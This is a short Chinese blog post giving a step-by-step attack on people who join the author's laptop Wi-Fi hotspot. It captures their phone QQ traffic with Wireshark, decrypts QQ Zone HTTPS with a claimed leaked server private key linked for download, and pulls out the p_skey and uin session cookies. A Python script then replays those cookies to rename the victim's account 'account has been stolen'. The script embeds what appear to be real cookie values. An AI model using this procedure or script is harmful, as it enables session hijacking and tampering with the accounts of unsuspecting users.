盜取連接你wifi的人的qq
阿新 • • 發佈:2018-05-26
修改 ade data 數據 header 系統 amp 制造 請求 五、解密wireshark捕獲的數據包
#本文內容僅供個人娛樂學習
思路:
使用wireshark監聽筆記本的wifi熱點,攔截捕獲連接你的wifi熱點的人的手機qq網絡數據包,從網絡數據包中分析取出兩個qq空間的兩個coookie值,使用cookie值修改掉連接你的wifi的人的qq昵稱,從而制造賬號被盜的假象。
實現:
所需工具:wireshark數據包分析系統,能啟用wifi熱點的筆記本,一門可以輸出http請求的編程語言。
一、啟用wifi熱點
二、確定wifi熱點的接口名稱
三、打開wireshark監聽這個網絡接口
四、用手機連接這個wifi熱點,然後打開手機qq瀏覽一下動態(qq空間)
五、解密wireshark捕獲的數據包
未解密的數據流:
qq空間使用了https協議,wireshark無法自動解密https數據流,我們給wireshark提供一個qq空間的服務器證書私鑰就可以解密qq空間的數據流了。
這裏我已經拿到了qq空間的私鑰,qzone.key下載地址:https://pan.baidu.com/s/1HeF9wLMOTVXA8kqWv6ZurQ
配置方法請見:http://www.cnblogs.com/aucy/p/9082429.html
解密後的數據流:
六、解密後在wireshark輸入篩選規則“http.cookie”,找到“p_skey”與對應的“uin”這倆cookie值
七、修改目標qq昵稱
數據包配置:
url:https://mobile.qzone.qq.com/profile_mod
cookie:p_uin=<uin值> p_skey=<p_skey值>
data:format=json&nickname=<想要改的昵稱>&birthyear=2018&birthmonth=1&birthday=1
我這裏使用python發送數據包:
from urllib import request def HTTP_POST(url,data,headers): req=request.Request(url,bytes(data,"utf-8"),headers) res=request.urlopen(req) print(res.read()) def ModNick(nick,cookies): url="https://mobile.qzone.qq.com/profile_mod" data="format=json&nickname="+nick+"&birthyear=2018&birthmonth=1&birthday=1" headers={ "cookie":cookies } HTTP_POST(url,data,headers) if __name__ == ‘__main__‘: ModNick("賬號已被盜","p_uin=o2221234077; p_skey=W7IF8j7lBIh3UeRdQq1wKS9ToHAKuJnKsjXgzOQmK5w_;")
盜取連接你wifi的人的qq